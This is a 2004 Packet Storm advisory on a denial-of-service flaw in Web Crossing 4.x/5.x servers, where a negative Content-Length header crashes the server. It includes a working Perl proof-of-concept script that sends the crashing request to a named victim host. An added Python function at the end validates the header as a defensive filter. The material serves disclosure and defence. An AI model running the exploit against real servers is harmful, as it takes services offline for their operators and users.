
webxdos.txt

03 Feb 2004 00:00:00 | Reported by Peter Winter-Smith | Type: packetstorm | Source: packetstormsecurity.com

Web Crossing 4.x/5.x has a Denial of Service vulnerability via an invalid Content-Length header.

Code
`Web Crossing 4.x/5.x Denial of Service Vulnerability  
  
###################################################  
  
Credit:  
Author : Peter Winter-Smith  
  
Software:  
Package : Web Crossing  
Versions : 4.x/5.x  
Vendor : WebCrossing, Inc.  
Vendor Url : http://www.webcrossing.com/  
  
Vulnerability:  
Bug Type : Denial of Service  
Severity : Less Critical  
  
  
1. Description of Software  
  
"Web Crossing is the world's leading collaboration server platform,  
offering complete solutions including discussion groups/bulletin boards,  
integrated newsgroups and mailing lists, full email services, calendar  
services, real-time chats, live events and full web application  
programming features, complete cross-platform compatibility, and  
distributed/mirrored serving for ultimate scaleability."  
- Vendors Description  
  
  
2. Bug Information  
  
(a). Denial of Service  
  
When an HTTP POST request is made to Web Crossing's built-in server  
application (default port 80/tcp), if the 'Content-Length' header supplied  
with the request is an extremely large or negative number, the server  
will encounter a set of instructions which lead to an integer-divide-by-  
zero problem, immediately crashing the server and denying any further  
service.  
  
The offending instruction is located at 0090121F:  
  
  
0090121F F7F9 IDIV ECX  
  
  
  
3. Proof of Concept  
  
The following perl script should crash any Web Crossing BBS using the  
built-in server application for hosting:  
  
  
#########################################################################  
#!/usr/bin/perl -w  
#  
# Web Crossing 4.x\5.x Denial of Service Exploit  
# [ Bad 'Content-Length' Header Bug ]  
#  
# - by Peter Winter-Smith [[email protected]]  
  
use IO::Socket;  
  
if(!($ARGV[0]))  
{  
print "Usage: wxdos.pl <victim>\n";  
exit;  
}  
  
print "Web Crossing 4.x\\5.x Denial of Service Exploit\n" .  
"\t[ Bad 'Content-Length' Header Bug ]\n" .  
"\t[peter4020\@hotmail.com]\n\n";  
  
$victim = IO::Socket::INET->new(Proto=>'tcp', PeerAddr=>$ARGV[0],  
PeerPort=>"80")  
or die "Unable to connect to $ARGV[0] on " .  
"port 80";  
  
  
$DoS = "POST / HTTP/1.1\r\n" .  
"Content-Length: -1\r\n\r\n";  
  
print $victim $DoS;  
  
print "[+] Evil request made to target server ... Waiting...!\n";  
  
sleep(4);  
  
close($victim);  
  
print "[+] Done!\n";  
exit;  
#########################################################################  
  
  
4. Patches - Workarounds  
  
Although I was able to contact the Web Crossing support staff, when the  
investigation into this flaw was handed over to the development team all  
contact was lost with both them and the support staff and my emails were  
no longer answered. I have decided to release this information so that  
users of Web Crossing can decide what would be a suitable course of action  
for protecting their systems from this bug.  
  
No vendor-supplied patches exist; I would recommend that filtering of the  
'Content-Length' header is put into action via some third party  
application if at all possible.  
  
  
5. Credits  
  
The discovery, analysis and exploitation of this flaw is a result of  
research carried out by Peter Winter-Smith. I would ask that you do not  
regard any of the analysis to be 'set in stone', and that if investigating  
this flaw you back trace the steps detailed earlier for yourself.  
  
Greets and thanks to:  
David and Mark Litchfield, JJ Gray (Nexus), Todd and all the  
packetstorm crew, Luigi Auriemma, Bahaa Naamneh, sean(gilbert(perlboy)),  
pv8man, nick k., Joel J. and Martine.  
  
o This document should be mirrored at  
http://www.elitehaven.net/webxdos.txt  
  
`
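The workaround in section 4 (filtering the 'Content-Length' header in front of the server) can be sketched as the check below. This is an added example, not part of the original advisory or any vendor code; the function name `check_content_length` and the `MAX_BODY_BYTES` limit are assumptions chosen for illustration, and the sample header blocks in the comments and tests are constructed.

```python
import re

# Assumed policy limit for this example; set it to the largest body the site accepts.
MAX_BODY_BYTES = 10 * 1024 * 1024

# HTTP grammar: Content-Length = 1*DIGIT (no sign, no embedded whitespace).
_DIGITS = re.compile(rb"[0-9]+")


def check_content_length(raw_head: bytes, max_body: int = MAX_BODY_BYTES):
    """Return (allowed, reason) for the header block of one HTTP request.

    raw_head is the request line plus headers, without the final blank line,
    e.g. b"POST / HTTP/1.1\r\nContent-Length: -1" (constructed sample).
    """
    values = []
    for line in raw_head.split(b"\r\n")[1:]:  # skip the request line
        name, sep, value = line.partition(b":")
        # Match case-insensitively and tolerate stray whitespace around the
        # name, so a lenient backend parser cannot see a header we missed.
        if sep and name.strip().lower() == b"content-length":
            values.append(value.strip(b" \t"))

    if not values:
        return True, "no Content-Length"
    if len(set(values)) > 1:
        return False, "conflicting Content-Length headers"

    value = values[0]
    # Rejects negative numbers, signs, hex, empty values and anything non-numeric.
    if not _DIGITS.fullmatch(value):
        return False, "Content-Length is not an unsigned decimal"
    # Bound the digit count before converting so absurdly long values are
    # refused without parsing them, then enforce the body size limit.
    if len(value) > 19 or int(value.decode("ascii")) > max_body:
        return False, "Content-Length exceeds limit"
    return True, "ok"
```

A filtering proxy would call this on each request head and answer rejected requests itself (for example with 400) instead of forwarding them to the backend.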
